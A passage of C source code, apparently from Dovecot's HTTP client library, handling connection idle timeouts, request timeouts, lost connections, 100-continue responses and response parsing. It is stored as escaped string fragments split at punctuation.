req_idx))\n\t\t\t\tcontinue;\n\t\t\t/* Drop request if not already aborted */\n\t\t\thttp_client_request_error(\n\t\t\t\t&req, HTTP_CLIENT_REQUEST_ERROR_ABORTED,\n\t\t\t\t\"Aborting\");\n\t\t}\n\t\tarray_clear(&conn->request_wait_list);\n\t}\n\tif (conn->pending_request !", "= NULL) {\n\t\treq = conn->pending_request;\n\t\t/* Drop reference from connection */\n\t\tif (http_client_connection_unref_request(\n\t\t\tconn, &conn->pending_request)) {\n\t\t\t/* Drop request if not already aborted */\n\t\t\thttp_client_request_error(\n\t\t\t\t&req, HTTP_CLIENT_REQUEST_ERROR_ABORTED,\n\t\t\t\t\"Aborting\");\n\t\t}\n\t}\n}\n\nstatic const char *\nhttp_client_connection_get_timing_info(struct http_client_connection *conn)\n{\n\tstruct http_client_request *const *requestp;\n\tunsigned int connected_msecs;\n\tstring_t *str = t_str_new(64);\n\n\tif (array_count(&conn->request_wait_list) > 0) {\n\t\trequestp = array_front(&conn->request_wait_list);\n\n\t\tstr_append(str, \"Request \");\n\t\thttp_client_request_append_stats_text(*requestp, str);\n\t} else {\n\t\tstr_append(str, \"No requests\");\n\t\tif (conn->conn.last_input !", "= 0) {\n\t\t\tstr_printfa(str, \", last input %d secs ago\",\n\t\t\t\t (int)(ioloop_time - conn->conn.last_input));\n\t\t}\n\t}\n\tconnected_msecs = timeval_diff_msecs(&ioloop_timeval,\n\t\t\t\t\t &conn->connected_timestamp);\n\tstr_printfa(str, \", connected %u.%03u secs ago\",\n\t\t connected_msecs/1000, connected_msecs%1000);\n\treturn str_c(str);\n}\n\nstatic void\nhttp_client_connection_abort_temp_error(struct http_client_connection **_conn,\n\t\t\t\t\tunsigned int status, const char *error)\n{\n\tstruct http_client_connection *conn = *_conn;\n\n\terror = t_strdup_printf(\"%s (%s)\", error,\n\t\t\t\thttp_client_connection_get_timing_info(conn));\n\n\te_debug(conn->event,\n\t\t\"Aborting connection with temporary error: %s\", error);\n\n\thttp_client_connection_disconnect(conn);\n\thttp_client_connection_retry_requests(conn, status, error);\n\thttp_client_connection_close(_conn);\n}\n\nvoid http_client_connection_lost(struct http_client_connection **_conn,\n\t\t\t\t const char *error)\n{\n\tstruct http_client_connection *conn = *_conn;\n\tconst char *sslerr;\n\n\tif (error == NULL)\n\t\terror = \"Connection lost\";\n\telse\n\t\terror = t_strdup_printf(\"Connection lost: %s\", error);\n\n\tif (conn->ssl_iostream !", "= NULL) {\n\t\tsslerr = ssl_iostream_get_last_error(conn->ssl_iostream);\n\t\tif (sslerr !", "= NULL) {\n\t\t\terror = t_strdup_printf(\"%s (last SSL error: %s)\",\n\t\t\t\t\t\terror, sslerr);\n\t\t}\n\t\tif (ssl_iostream_has_handshake_failed(conn->ssl_iostream)) {\n\t\t\t/* This isn't really a \"connection lost\", but that we\n\t\t\t don't trust the remote's SSL certificate. ", "don't\n\t\t\t retry. */", "\n\t\t\thttp_client_connection_abort_error(\n\t\t\t\t_conn,\n\t\t\t\tHTTP_CLIENT_REQUEST_ERROR_BAD_RESPONSE, error);\n\t\t\treturn;\n\t\t}\n\t}\n\n\tconn->lost_prematurely =\n\t\t(conn->conn.input !", "= NULL &&\n\t\t conn->conn.input->v_offset == 0 &&\n\t\t i_stream_get_data_size(conn->conn.input) == 0);\n\thttp_client_connection_abort_temp_error(\n\t\t_conn, HTTP_CLIENT_REQUEST_ERROR_CONNECTION_LOST, error);\n}\n\nvoid http_client_connection_handle_output_error(\n\tstruct http_client_connection *conn)\n{\n\tstruct ostream *output = conn->conn.output;\n\n\tif (output->stream_errno !", "= EPIPE &&\n\t output->stream_errno !", "= ECONNRESET) {\n\t\thttp_client_connection_lost(\n\t\t\t&conn,\n\t\t\tt_strdup_printf(\"write(%s) failed: %s\",\n\t\t\t\t\to_stream_get_name(output),\n\t\t\t\t\to_stream_get_error(output)));\n\t} else {\n\t\thttp_client_connection_lost(&conn, \"Remote disconnected\");\n\t}\n}\n\nint http_client_connection_check_ready(struct http_client_connection *conn)\n{\n\tconst struct http_client_settings *set =\n\t\thttp_client_connection_get_settings(conn);\n\n\tif (conn->in_req_callback) {\n\t\t/* This can happen when a nested ioloop is created inside\n\t\t request callback. ", "we currently don't reuse connections that\n\t\t are occupied this way, but theoretically we could, although\n\t\t that would add quite a bit of complexity.", "\n\t\t */\n\t\treturn 0;\n\t}\n\n\tif (!", "conn->connected || conn->output_locked || conn->output_broken ||\n\t conn->close_indicated || conn->tunneling ||\n\t (http_client_connection_count_pending(conn) >=\n\t set->max_pipelined_requests))\n\t\treturn 0;\n\n\tif (conn->last_ioloop !", "= NULL && conn->last_ioloop !", "= current_ioloop) {\n\t\tconn->last_ioloop = current_ioloop;\n\t\t/* Active ioloop is different from what we saw earlier;\n\t\t we may have missed a disconnection event on this connection.", "\n\t\t Verify status by reading from connection. */", "\n\t\tif (i_stream_read(conn->conn.input) == -1) {\n\t\t\tint stream_errno = conn->conn.input->stream_errno;\n\n\t\t\ti_assert(conn->conn.input->stream_errno !", "= 0 ||\n\t\t\t\t conn->conn.input->eof);\n\t\t\thttp_client_connection_lost(&conn,\n\t\t\t\tt_strdup_printf(\"read(%s) failed: %s\",\n\t\t\t\t\t\ti_stream_get_name(conn->conn.input),\n\t\t\t\t\t\tstream_errno !", "= 0 ?", "\n\t\t\t\t\t\ti_stream_get_error(conn->conn.input) :\n\t\t\t\t\t\t\"EOF\"));\n\t\t\treturn -1;\n\t\t}\n\n\t\t/* We may have read some data */\n\t\tif (i_stream_get_data_size(conn->conn.input) > 0)\n\t\t\ti_stream_set_input_pending(conn->conn.input, TRUE);\n\t}\n\treturn 1;\n}\n\nstatic void\nhttp_client_connection_detach_peer(struct http_client_connection *conn)\n{\n\tstruct http_client_peer *peer = conn->peer;\n\tstruct http_client_connection *const *conn_idx;\n\tARRAY_TYPE(http_client_connection) *conn_arr;\n\tbool found = FALSE;\n\n\tif (peer == NULL)\n\t\treturn;\n\n\thttp_client_peer_ref(peer);\n\tconn_arr = &peer->conns;\n\tarray_foreach(conn_arr, conn_idx) {\n\t\tif (*conn_idx == conn) {\n\t\t\tarray_delete(conn_arr,\n\t\t\t\t array_foreach_idx(conn_arr, conn_idx), 1);\n\t\t\tfound = TRUE;\n\t\t\tbreak;\n\t\t}\n\t}\n\ti_assert(found);\n\n\tconn_arr = &peer->pending_conns;\n\tarray_foreach(conn_arr, conn_idx) {\n\t\tif (*conn_idx == conn) {\n\t\t\tarray_delete(conn_arr,\n\t\t\t\t array_foreach_idx(conn_arr, conn_idx), 1);\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tconn->peer = NULL;\n\te_debug(conn->event, \"Detached peer\");\n\n\tif (conn->connect_succeeded)\n\t\thttp_client_peer_connection_lost(peer, conn->lost_prematurely);\n\thttp_client_peer_unref(&peer);\n}\n\nstatic void\nhttp_client_connection_idle_timeout(struct http_client_connection *conn)\n{\n\te_debug(conn->event, \"Idle connection timed out\");\n\n\t/* Cannot get here unless connection was established at some point */\n\ti_assert(conn->connect_succeeded);\n\n\thttp_client_connection_close(&conn);\n}\n\nstatic unsigned int\nhttp_client_connection_start_idle_timeout(struct http_client_connection *conn)\n{\n\tconst struct http_client_settings *set =\n\t\thttp_client_connection_get_settings(conn);\n\tstruct http_client_peer_pool *ppool = conn->ppool;\n\tstruct http_client_peer_shared *pshared = ppool->peer;\n\tunsigned int timeout, count, idle_count, max;\n\n\ti_assert(conn->to_idle == NULL);\n\n\tif (set->max_idle_time_msecs == 0)\n\t\treturn UINT_MAX;\n\n\tcount = array_count(&ppool->conns);\n\tidle_count = array_count(&ppool->idle_conns);\n\tmax = http_client_peer_shared_max_connections(pshared);\n\ti_assert(count > 0);\n\ti_assert(count >= idle_count + 1);\n\ti_assert(max > 0);\n\n\t/* Set timeout for this connection */\n\tif (idle_count == 0 || max == UINT_MAX) {\n\t\t/* No idle connections yet or infinite connections allowed;\n\t\t use the maximum idle time. */", "\n\t\ttimeout = set->max_idle_time_msecs;\n\t} else if (count > max || idle_count >= max) {\n\t\t/* Instant death for (urgent) connections above limit */\n\t\ttimeout = 0;\n\t} else {\n\t\tunsigned int idle_slots_avail;\n\t\tdouble idle_time_per_slot;\n\n\t\t/* Kill duplicate connections quicker;\n\t\t linearly based on the number of connections */\n\t\tidle_slots_avail = max - idle_count;\n\t\tidle_time_per_slot = (double)set->max_idle_time_msecs / max;\n\t\ttimeout = (unsigned int)(idle_time_per_slot * idle_slots_avail);\n\t\tif (timeout < HTTP_CLIENT_MIN_IDLE_TIMEOUT_MSECS)\n\t\t\ttimeout = HTTP_CLIENT_MIN_IDLE_TIMEOUT_MSECS;\n\t}\n\n\tconn->to_idle = timeout_add_short_to(\n\t\tconn->conn.ioloop, timeout,\n\t\thttp_client_connection_idle_timeout, conn);\n\treturn timeout;\n}\n\nstatic void\nhttp_client_connection_start_idle(struct http_client_connection *conn,\n\t\t\t\t const char *reason)\n{\n\tstruct http_client_peer_pool *ppool = conn->ppool;\n\tunsigned int timeout;\n\n\tif (conn->idle) {\n\t\te_debug(conn->event, \"%s; already idle\", reason);\n\t\treturn;\n\t}\n\n\ttimeout = http_client_connection_start_idle_timeout(conn);\n\tif (timeout == UINT_MAX)\n\t\te_debug(conn->event, \"%s; going idle\", reason);\n\telse {\n\t\te_debug(conn->event, \"%s; going idle (timeout = %u msecs)\",\n\t\t\treason, timeout);\n\t}\n\n\tconn->idle = TRUE;\n\tarray_push_back(&ppool->idle_conns, &conn);\n}\n\nvoid http_client_connection_lost_peer(struct http_client_connection *conn)\n{\n\tif (!", "conn->connected) {\n\t\thttp_client_connection_unref(&conn);\n\t\treturn;\n\t}\n\n\ti_assert(!conn->in_req_callback);\n\n\thttp_client_connection_start_idle(conn, \"Lost peer\");\n\thttp_client_connection_detach_peer(conn);\n}\n\nvoid http_client_connection_check_idle(struct http_client_connection *conn)\n{\n\tstruct http_client_peer *peer;\n\n\tpeer = conn->peer;\n\tif (peer == NULL) {\n\t\ti_assert(conn->idle);\n\t\treturn;\n\t}\n\n\tif (conn->idle) {\n\t\t/* Already idle */\n\t\treturn;\n\t}\n\n\tif (conn->connected && !", "http_client_connection_is_active(conn)) {\n\t\tstruct http_client *client = peer->client;\n\n\t\ti_assert(conn->to_requests == NULL);\n\n\t\tif (client->waiting)\n\t\t\tio_loop_stop(client->ioloop);\n\n\t\thttp_client_connection_start_idle(\n\t\t\tconn, \"No more requests queued\");\n\t}\n}\n\nstatic void\nhttp_client_connection_stop_idle(struct http_client_connection *conn)\n{\n\tstruct http_client_connection *const *conn_idx;\n\tARRAY_TYPE(http_client_connection) *conn_arr;\n\n\ttimeout_remove(&conn->to_idle);\n\tconn->idle = FALSE;\n\n\tconn_arr = &conn->ppool->idle_conns;\n\tarray_foreach(conn_arr, conn_idx) {\n\t\tif (*conn_idx == conn) {\n\t\t\tarray_delete(conn_arr,\n\t\t\t\t array_foreach_idx(conn_arr, conn_idx), 1);\n\t\t\tbreak;\n\t\t}\n\t}\n}\n\nvoid http_client_connection_claim_idle(struct http_client_connection *conn,\n\t\t\t\t struct http_client_peer *peer)\n{\n\te_debug(conn->event, \"Claimed as idle\");\n\n\ti_assert(peer->ppool == conn->ppool);\n\thttp_client_connection_stop_idle(conn);\n\n\tif (conn->peer == NULL || conn->peer !", "= peer) {\n\t\thttp_client_connection_detach_peer(conn);\n\n\t\tconn->peer = peer;\n\t\tconn->debug = peer->client->set.debug;\n\t\tarray_push_back(&peer->conns, &conn);\n\t}\n}\n\nstatic void\nhttp_client_connection_request_timeout(struct http_client_connection *conn)\n{\n\tconn->conn.input->stream_errno = ETIMEDOUT;\n\thttp_client_connection_abort_temp_error(\n\t\t&conn, HTTP_CLIENT_REQUEST_ERROR_TIMED_OUT,\n\t\t\"Request timed out\");\n}\n\nvoid http_client_connection_start_request_timeout(\n\tstruct http_client_connection *conn)\n{\n\tstruct http_client_request *const *requestp;\n\tunsigned int timeout_msecs;\n\n\tif (conn->pending_request !", "= NULL)\n\t\treturn;\n\n\ti_assert(array_is_created(&conn->request_wait_list));\n\ti_assert(array_count(&conn->request_wait_list) > 0);\n\trequestp = array_front(&conn->request_wait_list);\n\ttimeout_msecs = (*requestp)->attempt_timeout_msecs;\n\n\tif (timeout_msecs == 0)\n\t\t;\n\telse if (conn->to_requests !", "= NULL)\n\t\ttimeout_reset(conn->to_requests);\n\telse {\n\t\tconn->to_requests = timeout_add_to(\n\t\t\tconn->conn.ioloop, timeout_msecs,\n\t\t\thttp_client_connection_request_timeout, conn);\n\t}\n}\n\nvoid http_client_connection_reset_request_timeout(\n\tstruct http_client_connection *conn)\n{\n\tif (conn->to_requests !", "= NULL)\n\t\ttimeout_reset(conn->to_requests);\n}\n\nvoid http_client_connection_stop_request_timeout(\n\tstruct http_client_connection *conn)\n{\n\ttimeout_remove(&conn->to_requests);\n}\n\nstatic void\nhttp_client_connection_continue_timeout(struct http_client_connection *conn)\n{\n\tstruct http_client_peer_shared *pshared = conn->ppool->peer;\n\tstruct http_client_request *const *wait_reqs;\n\tstruct http_client_request *req;\n\tunsigned int wait_count;\n\n\ti_assert(conn->pending_request == NULL);\n\n\ttimeout_remove(&conn->to_response);\n\tpshared->no_payload_sync = TRUE;\n\n\te_debug(conn->event,\n\t\t\"Expected 100-continue response timed out; \"\n\t\t\"sending payload anyway\");\n\n\twait_reqs = array_get(&conn->request_wait_list, &wait_count);\n\ti_assert(wait_count == 1);\n\treq = wait_reqs[wait_count-1];\n\n\treq->payload_sync_continue = TRUE;\n\tif (conn->conn.output !", "= NULL)\n\t\to_stream_set_flush_pending(conn->conn.output, TRUE);\n}\n\nint http_client_connection_next_request(struct http_client_connection *conn)\n{\n\tstruct http_client_connection *tmp_conn;\n\tstruct http_client_peer *peer = conn->peer;\n\tstruct http_client_peer_shared *pshared = conn->ppool->peer;\n\tstruct http_client_request *req = NULL;\n\tbool pipelined;\n\tint ret;\n\n\tif ((ret = http_client_connection_check_ready(conn)) <= 0) {\n\t\tif (ret == 0)\n\t\t\te_debug(conn->event, \"Not ready for next request\");\n\t\treturn ret;\n\t}\n\n\t/* Claim request, but no urgent request can be second in line */\n\tpipelined = (array_count(&conn->request_wait_list) > 0 ||\n\t\t conn->pending_request !", "= NULL);\n\treq = http_client_peer_claim_request(peer, pipelined);\n\tif (req == NULL)\n\t\treturn 0;\n\n\ti_assert(req->state == HTTP_REQUEST_STATE_QUEUED);\n\n\thttp_client_connection_stop_idle(conn);\n\n\treq->payload_sync_continue = FALSE;\n\tif (pshared->no_payload_sync)\n\t\treq->payload_sync = FALSE;\n\n\t/* Add request to wait list and add a reference */\n\tarray_push_back(&conn->request_wait_list, &req);\n\thttp_client_connection_ref_request(conn, req);\n\n\te_debug(conn->event, \"Claimed request %s\",\n\t\thttp_client_request_label(req));\n\n\ttmp_conn = conn;\n\thttp_client_connection_ref(tmp_conn);\n\tret = http_client_request_send(req, pipelined);\n\tif (ret == 0 && conn->conn.output !", "= NULL)\n\t\to_stream_set_flush_pending(conn->conn.output, TRUE);\n\tif (!", "http_client_connection_unref(&tmp_conn) || ret < 0)\n\t\treturn -1;\n\n\tif (req->connect_tunnel)\n\t\tconn->tunneling = TRUE;\n\n\t/* RFC 7231, Section 5.1.1: Expect\n\n\t o A client that sends a 100-continue expectation is not required to\n\t wait for any specific length of time; such a client MAY proceed\n\t to send the message body even if it has not yet received a\n\t response. ", "Furthermore, since 100 (Continue) responses cannot be\n\t sent through an HTTP/1.0 intermediary, such a client SHOULD NOT\n\t wait for an indefinite period before sending the message body.", "\n\t */\n\tif (req->payload_sync && !", "pshared->seen_100_response) {\n\t\ti_assert(!pipelined);\n\t\ti_assert(req->payload_chunked || req->payload_size > 0);\n\t\ti_assert(conn->to_response == NULL);\n\t\tconn->to_response = timeout_add_to(\n\t\t\tconn->conn.ioloop, HTTP_CLIENT_CONTINUE_TIMEOUT_MSECS,\n\t\t\thttp_client_connection_continue_timeout, conn);\n\t}\n\n\treturn 1;\n}\n\nstatic void http_client_connection_destroy(struct connection *_conn)\n{\n\tstruct http_client_connection *conn =\n\t\t(struct http_client_connection *)_conn;\n\tconst char *error;\n\tunsigned int msecs;\n\n\tswitch (_conn->disconnect_reason) {\n\tcase CONNECTION_DISCONNECT_CONNECT_TIMEOUT:\n\t\tif (conn->connected_timestamp.tv_sec == 0) {\n\t\t\tmsecs = timeval_diff_msecs(\n\t\t\t\t&ioloop_timeval,\n\t\t\t\t&conn->connect_start_timestamp);\n\t\t\terror = t_strdup_printf(\n\t\t\t\t\"connect(%s) failed: \"\n\t\t\t\t\"Connection timed out in %u.%03u secs\",\n\t\t\t\t_conn->name, msecs/1000, msecs%1000);\n\t\t} else {\n\t\t\tmsecs = timeval_diff_msecs(&ioloop_timeval,\n\t\t\t\t\t\t &conn->connected_timestamp);\n\t\t\terror = t_strdup_printf(\n\t\t\t\t\"SSL handshaking with %s failed: \"\n\t\t\t\t\"Connection timed out in %u.%03u secs\",\n\t\t\t\t_conn->name, msecs/1000, msecs%1000);\n\t\t}\n\t\te_debug(conn->event, \"%s\", error);\n\t\thttp_client_connection_failure(conn, error);\n\t\tbreak;\n\tcase CONNECTION_DISCONNECT_CONN_CLOSED:\n\t\tif (conn->connect_failed) {\n\t\t\ti_assert(!array_is_created(&conn->request_wait_list) ||\n\t\t\t\tarray_count(&conn->request_wait_list) == 0);\n\t\t\tbreak;\n\t\t}\n\t\thttp_client_connection_lost(\n\t\t\t&conn, (_conn->input == NULL ?", "\n\t\t\t\tNULL : i_stream_get_error(_conn->input)));\n\t\treturn;\n\tdefault:\n\t\tbreak;\n\t}\n\n\thttp_client_connection_close(&conn);\n}\n\nstatic void http_client_payload_finished(struct http_client_connection *conn)\n{\n\ttimeout_remove(&conn->to_input);\n\tconnection_input_resume(&conn->conn);\n\tif (array_count(&conn->request_wait_list) > 0)\n\t\thttp_client_connection_start_request_timeout(conn);\n\telse\n\t\thttp_client_connection_stop_request_timeout(conn);\n}\n\nstatic void\nhttp_client_payload_destroyed_timeout(struct http_client_connection *conn)\n{\n\tif (conn->close_indicated) {\n\t\thttp_client_connection_server_close(&conn);\n\t\treturn;\n\t}\n\thttp_client_connection_input(&conn->conn);\n}\n\nstatic void http_client_payload_destroyed(struct http_client_request *req)\n{\n\tstruct http_client_connection *conn = req->conn;\n\n\ti_assert(conn !", "= NULL);\n\ti_assert(conn->pending_request == req);\n\ti_assert(conn->incoming_payload !", "= NULL);\n\ti_assert(conn->conn.io == NULL);\n\n\te_debug(conn->event,\n\t\t\"Response payload stream destroyed \"\n\t\t\"(%u ms after initial response)\",\n\t\ttimeval_diff_msecs(&ioloop_timeval, &req->response_time));\n\n\t/* Caller is allowed to change the socket fd to blocking while reading\n\t the payload. ", "make sure here that it's switched back. */", "\n\tnet_set_nonblock(conn->conn.fd_in, TRUE);\n\n\ti_assert(req->response_offset < conn->conn.input->v_offset);\n\treq->bytes_in = conn->conn.input->v_offset - req->response_offset;\n\n\t/* Drop reference from connection */\n\tif (http_client_connection_unref_request(\n\t\tconn, &conn->pending_request)) {\n\t\t/* Finish request if not already aborted */\n\t\thttp_client_request_finish(req);\n\t}\n\n\tconn->incoming_payload = NULL;\n\n\t/* Input stream may have pending input. ", "make sure input handler\n\t gets called (but don't do it directly, since we get get here\n\t somewhere from the API user's code, which we can't really know what\n\t state it is in). ", "this call also triggers sending a new request if\n\t necessary. */", "\n\tif (!", "conn->disconnected) {\n\t\tconn->to_input = timeout_add_short_to(\n\t\t\tconn->conn.ioloop, 0,\n\t\t\thttp_client_payload_destroyed_timeout, conn);\n\t}\n\n\t/* Room for new requests */\n\tif (http_client_connection_check_ready(conn) > 0)\n\t\thttp_client_peer_trigger_request_handler(conn->peer);\n}\n\nvoid http_client_connection_request_destroyed(\n\tstruct http_client_connection *conn, struct http_client_request *req)\n{\n\tstruct istream *payload;\n\n\ti_assert(req->conn == conn);\n\tif (conn->pending_request !", "= req)\n\t\treturn;\n\n\te_debug(conn->event, \"Pending request destroyed prematurely\");\n\n\tpayload = conn->incoming_payload;\n\tif (payload == NULL) {\n\t\t/* Payload already gone */\n\t\treturn;\n\t}\n\n\t/* Destroy the payload, so that the timeout istream is closed */\n\ti_stream_ref(payload);\n\ti_stream_destroy(&payload);\n\n\tpayload = conn->incoming_payload;\n\tif (payload == NULL) {\n\t\t/* Not going to happen, but check for it anyway */\n\t\treturn;\n\t}\n\n\t/* The application still holds a reference to the payload stream, but it\n\t is closed and we don't care about it anymore, so act as though it is\n\t destroyed. */", "\n\ti_stream_remove_destroy_callback(payload,\n\t\t\t\t\t http_client_payload_destroyed);\n\thttp_client_payload_destroyed(req);\n}\n\nstatic bool\nhttp_client_connection_return_response(struct http_client_connection *conn,\n\t\t\t\t struct http_client_request *req,\n\t\t\t\t struct http_response *response)\n{\n\tstruct http_client_peer_shared *pshared = conn->ppool->peer;\n\tstruct istream *payload;\n\tbool retrying;\n\n\ti_assert(!conn->in_req_callback);\n\ti_assert(conn->incoming_payload == NULL);\n\ti_assert(conn->pending_request == NULL);\n\n\thttp_client_connection_ref(conn);\n\thttp_client_connection_ref_request(conn, req);\n\treq->state = HTTP_REQUEST_STATE_GOT_RESPONSE;\n\n\tif (response->payload !", "= NULL) {\n\t\t/* Wrap the stream to capture the destroy event without\n\t\t destroying the actual payload stream. ", "we are already expected\n\t\t to be on the correct ioloop, so there should be no need to\n\t\t switch the stream's ioloop here. */", "\n\t\tconn->incoming_payload = response->payload =\n\t\t\ti_stream_create_timeout(response->payload,\n\t\t\t\t\t\treq->attempt_timeout_msecs);\n\t\ti_stream_add_destroy_callback(response->payload,\n\t\t\t\t\t http_client_payload_destroyed,\n\t\t\t\t\t req);\n\t\t/* The callback may add its own I/O, so we need to remove\n\t\t our one before calling it */\n\t\tconnection_input_halt(&conn->conn);\n\t\t/* We've received the request itself, and we can't reset the\n\t\t timeout during the payload reading. */", "\n\t\thttp_client_connection_stop_request_timeout(conn);\n\t}\n\n\tconn->in_req_callback = TRUE;\n\tretrying = !", "http_client_request_callback(req, response);\n\tif (conn->disconnected) {\n\t\t/* The callback managed to get this connection disconnected */\n\t\tif (!", "retrying)\n\t\t\thttp_client_request_finish(req);\n\t\thttp_client_connection_unref_request(conn, &req);\n\t\thttp_client_connection_unref(&conn);\n\t\treturn FALSE;\n\t}\n\tconn->in_req_callback = FALSE;\n\n\tif (retrying) {\n\t\t/* Retrying, don't destroy the request */\n\t\tif (response->payload !", "= NULL) {\n\t\t\ti_stream_remove_destroy_callback(conn->incoming_payload,\n\t\t\t\t\t\t\t http_client_payload_destroyed);\n\t\t\ti_stream_unref(&conn->incoming_payload);\n\t\t\tconnection_input_resume(&conn->conn);\n\t\t}\n\t\thttp_client_connection_unref_request(conn, &req);\n\t\treturn http_client_connection_unref(&conn);\n\t}\n\n\tif (response->payload !", "= NULL) {\n\t\treq->state = HTTP_REQUEST_STATE_PAYLOAD_IN;\n\t\tpayload = response->payload;\n\t\tresponse->payload = NULL;\n\n\t\t/* Maintain request reference while payload is pending */\n\t\tconn->pending_request = req;\n\n\t\t/* Request is dereferenced in payload destroy callback */\n\t\ti_stream_unref(&payload);\n\n\t\tif (conn->to_input !", "= NULL && conn->conn.input !", "= NULL) {\n\t\t\t/* Already finished reading the payload */\n\t\t\thttp_client_payload_finished(conn);\n\t\t}\n\t} else {\n\t\thttp_client_request_finish(req);\n\t\thttp_client_connection_unref_request(conn, &req);\n\t}\n\n\tif (conn->incoming_payload == NULL && conn->conn.input !", "= NULL) {\n\t\ti_assert(conn->conn.io !", "= NULL ||\n\t\t\t pshared->addr.type == HTTP_CLIENT_PEER_ADDR_RAW);\n\t\treturn http_client_connection_unref(&conn);\n\t}\n\thttp_client_connection_unref(&conn);\n\treturn FALSE;\n}\n\nstatic const char *\nhttp_client_request_add_event_headers(struct http_client_request *req,\n\t\t\t\t const struct http_response *response)\n{\n\tif (req->event_headers == NULL)\n\t\treturn \"\";\n\n\tstring_t *str = t_str_new(128);\n\tfor (unsigned int i = 0; req->event_headers[i] !", "= NULL; i++) {\n\t\tconst char *hdr_name = req->event_headers[i];\n\t\tconst char *value = http_response_header_get(response, hdr_name);\n\n\t\tif (value == NULL)\n\t\t\tcontinue;\n\n\t\tstr_append(str, str_len(str) == 0 ? \" (\" : \", \");", "\n\t\tevent_add_str(req->event,\n\t\t\t t_strconcat(\"http_hdr_\", hdr_name, NULL), value);\n\t\tstr_printfa(str, \"%s:%s\", hdr_name, value);\n\t}\n\tif (str_len(str) > 0)\n\t\tstr_append_c(str, ')');\n\treturn str_c(str);\n}\n\nstatic void http_client_connection_input(struct connection *_conn)\n{\n\tstruct http_client_connection *conn =\n\t\t(struct http_client_connection *)_conn;\n\tstruct http_client_peer *peer = conn->peer;\n\tstruct http_client_peer_shared *pshared = conn->ppool->peer;\n\tstruct http_response response;\n\tstruct http_client_request *const *reqs;\n\tstruct http_client_request *req = NULL, *req_ref;\n\tenum http_response_payload_type payload_type;\n\tunsigned int count;\n\tint finished = 0, ret;\n\tconst char *error;\n\n\ti_assert(conn->incoming_payload == NULL);\n\n\t_conn->last_input = ioloop_time;\n\n\tif (conn->ssl_iostream !", "= NULL &&\n\t\t!", "ssl_iostream_is_handshaked(conn->ssl_iostream)) {\n\t\t/* Finish SSL negotiation by reading from input stream */\n\t\twhile ((ret = i_stream_read(conn->conn.input)) > 0 ||\n\t\t ret == -2) {\n\t\t\tif (ssl_iostream_is_handshaked(conn->ssl_iostream))\n\t\t\t\tbreak;\n\t\t}\n\t\tif (ret < 0) {\n\t\t\tint stream_errno = conn->conn.input->stream_errno;\n\n\t\t\t/* Failed somehow */\n\t\t\ti_assert(ret !", "= -2);\n\t\t\terror = t_strdup_printf(\n\t\t\t\t\"SSL handshaking with %s failed: \"\n\t\t\t\t\"read(%s) failed: %s\",\n\t\t\t\t_conn->name,\n\t\t\t\ti_stream_get_name(conn->conn.input),\n\t\t\t\t(stream_errno !", "= 0 ?", "\n\t\t\t\t i_stream_get_error(conn->conn.input) : \"EOF\"));\n\t\t\thttp_client_connection_failure(conn, error);\n\t\t\te_debug(conn->event, \"%s\", error);\n\t\t\thttp_client_connection_close(&conn);\n\t\t\treturn;\n\t\t}\n\n\t\tif (!", "ssl_iostream_is_handshaked(conn->ssl_iostream)) {\n\t\t\t/* Not finished */\n\t\t\ti_assert(ret == 0);\n\t\t\treturn;\n\t\t}\n\t}\n\n\tif (!", "conn->connect_succeeded) {\n\t\t/* Just got ready for first request */\n\t\thttp_client_connection_ready(conn);\n\t}\n\n\tif (conn->to_input !", "= NULL) {\n\t\t/* We came here from a timeout added by\n\t\t http_client_payload_destroyed(). ", "The IO couldn't be added\n\t\t back immediately in there, because the HTTP API user may\n\t\t still have had its own IO pointed to the same fd. ", "It should\n\t\t be removed by now, so we can add it back. */", "\n\t\thttp_client_payload_finished(conn);\n\t\tfinished++;\n\t}\n\n\t/* We've seen activity from the server; reset request timeout */\n\thttp_client_connection_reset_request_timeout(conn);\n\n\t/* Get first waiting request */\n\treqs = array_get(&conn->request_wait_list, &count);\n\tif (count > 0) {\n\t\treq = reqs[0];\n\n\t\t/* Determine whether to expect a response payload */\n\t\tpayload_type = http_client_request_get_payload_type(req);\n\t} else {\n\t\treq = NULL;\n\t\tpayload_type = HTTP_RESPONSE_PAYLOAD_TYPE_ALLOWED;\n\t\ti_assert(conn->to_requests == NULL);\n\t}\n\n\t/* Drop connection with broken output if last possible input was\n\t received */\n\tif (conn->output_broken && (count == 0 ||\n\t (count == 1 && req->state == HTTP_REQUEST_STATE_ABORTED))) {\n\t\thttp_client_connection_server_close(&conn);\n\t\treturn;\n\t}\n\n\twhile ((ret = http_response_parse_next(conn->http_parser, payload_type,\n\t\t\t\t\t &response, &error)) > 0) {\n\t\tbool aborted, early = FALSE;\n\n\t\tif (req == NULL) {\n\t\t\t/* Server sent response without any requests in the wait\n\t\t\t list */\n\t\t\tif (response.status == 408) {\n\t\t\t\te_debug(conn->event,\n\t\t\t\t\t\"Server explicitly closed connection: \"\n\t\t\t\t\t\"408 %s\", response.reason);\n\t\t\t} else {\n\t\t\t\te_debug(conn->event,\n\t\t\t\t\t\"Got unexpected input from server: \"\n\t\t\t\t\t\"%u %s\", response.status,\n\t\t\t\t\tresponse.reason);\n\t\t\t}\n\t\t\thttp_client_connection_close(&conn);\n\t\t\treturn;\n\t\t}\n\n\t\treq->response_time = ioloop_timeval;\n\t\treq->response_offset =\n\t\t\thttp_response_parser_get_last_offset(conn->http_parser);\n\t\ti_assert(req->response_offset !", "= (uoff_t)-1);\n\t\ti_assert(req->response_offset < conn->conn.input->v_offset);\n\t\treq->bytes_in = conn->conn.input->v_offset - req->response_offset;\n\n\t\t/* Got some response; cancel response timeout */\n\t\ttimeout_remove(&conn->to_response);\n\n\t\t/* RFC 7231, Section 6.2:\n\n\t\t A client MUST be able to parse one or more 1xx responses\n\t\t received prior to a final response, even if the client does\n\t\t not expect one. ", "A user agent MAY ignore unexpected 1xx\n\t\t responses.", "\n\t\t */\n\t\tif (req->payload_sync && response.status == 100) {\n\t\t\tif (req->payload_sync_continue) {\n\t\t\t\te_debug(conn->event,\n\t\t\t\t\t\"Got 100-continue response after timeout\");\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t\tpshared->no_payload_sync = FALSE;\n\t\t\tpshared->seen_100_response = TRUE;\n\t\t\treq->payload_sync_continue = TRUE;\n\n\t\t\te_debug(conn->event,\n\t\t\t\t\"Got expected 100-continue response\");\n\n\t\t\tif (req->state == HTTP_REQUEST_STATE_ABORTED) {\n\t\t\t\te_debug(conn->event,\n\t\t\t\t\t\"Request aborted before sending payload was complete.\");", 